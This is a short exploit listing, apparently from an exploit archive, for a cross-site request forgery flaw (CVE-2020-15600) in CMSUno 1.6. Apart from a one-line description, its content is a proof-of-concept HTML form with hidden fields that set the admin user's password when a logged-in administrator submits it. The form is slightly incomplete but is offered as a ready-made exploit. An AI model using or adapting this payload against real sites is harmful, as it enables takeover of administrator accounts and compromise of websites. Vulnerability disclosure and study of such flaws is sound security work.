CMSUno 1.6 Cross Site Request Forgery

CMSUno version 1.6 suffers from a cross site request forgery vulnerability.

MD5 | 2dc520d23a1ef4ec186a4cdb1bb261d1

# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Date: 2020-05-31
# Exploit Author: Noth
# Vendor Homepage:
# Software Link:
# Version: v1.6
# CVE : 2020-15600

An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.

PoC :

<form action=“”method=“POST”>
<input type=“hidden” name=“user” value=“admin”/>
<input type=“hidden” name=“pass” value=“yourpassword”/>
<input type=“submit” name=“user” value=“Submit request”/>

Related Posts